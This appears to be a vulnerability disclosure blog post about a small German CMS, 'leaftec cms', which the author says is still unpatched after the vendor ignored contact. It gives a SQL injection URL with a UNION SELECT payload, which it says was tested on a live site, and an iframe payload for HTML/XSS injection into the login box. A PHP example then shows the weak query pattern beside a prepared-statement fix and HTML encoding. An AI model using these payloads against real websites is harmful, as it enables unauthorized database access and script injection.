leaftec cms multiple vulnerabilities

leaftec cms is a small CMS being developed by a German individual / German company. Sadly the CMS is not available for free download, so I stumbled across the vulnerabilities while I was visiting a website which was based on the leaftec cms.

I contacted the vendor, but sadly my contact attempts were ignored and the vulnerabilities are still present today.

#1 SQL Injection

Vulnerable URL:

http://www.some-cool-domain.tld/article.php?id=XX

Examples for testing and injecting SQL stuff:

http://www.some-cool-domain.tld/article.php?id='

http://www.some-cool-domain.tld/article.php?id="

http://www.some-cool-domain.tld/article.php?id=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,concat(version()),7--

(Tested on a live website using leaftec cms.)

#2 XSS / HTML Code Injection

Several parts of the CMS allow HTML and JavaScript code injection, e.g. the login box.

After submitting the form, the CMS puts a red border around the login and password fields but also renders the injected code in the page.

Example for HTML code:

"><iframe src=http://www.google.de></iframe>
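
A defensive counterpart to both findings above, as an added example that is not leaftec code (the CMS source is not public): the weak query pattern next to a validated, bound one for the `id` parameter, and HTML-encoded re-display for the login box. PHP is assumed from the `article.php` URL; the table, column and function names are hypothetical, and an in-memory SQLite database (pdo_sqlite) stands in for the real backend.

```php
<?php
declare(strict_types=1);
// Added example, not leaftec code: table, columns and function names are
// hypothetical; the data is constructed and lives in an in-memory SQLite DB.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec("INSERT INTO articles VALUES (1, 'Welcome', 'First post')");

// Weak pattern: the id parameter is concatenated into the statement, so its
// contents are parsed as SQL instead of being treated as a value.
function fetch_article_weak(PDO $db, string $id): array
{
    return $db->query('SELECT id, title, body FROM articles WHERE id = ' . $id)
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Corrected pattern: reject anything that is not a plain decimal id, then
// bind the value so the driver never interprets it as SQL.
function fetch_article(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        return [];
    }
    $stmt = $db->prepare('SELECT id, title, body FROM articles WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Login box: re-display the submitted value only after HTML-encoding it, in a
// quoted attribute, so quotes and angle brackets cannot break out of it.
function login_field(string $name, string $submitted, bool $error): string
{
    $class = $error ? 'field error' : 'field';
    return sprintf(
        '<input type="text" name="%s" class="%s" value="%s">',
        htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'),
        $class,
        htmlspecialchars($submitted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
    );
}

$probe = '0 OR 1=1';  // constructed non-numeric id value
var_dump(count(fetch_article_weak($db, $probe)));  // weak: input changes the query
var_dump(count(fetch_article($db, $probe)));       // corrected: input is rejected
echo login_field('login', '"><b>x</b>', true), "\n"; // markup arrives as text
```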

Read all details here.
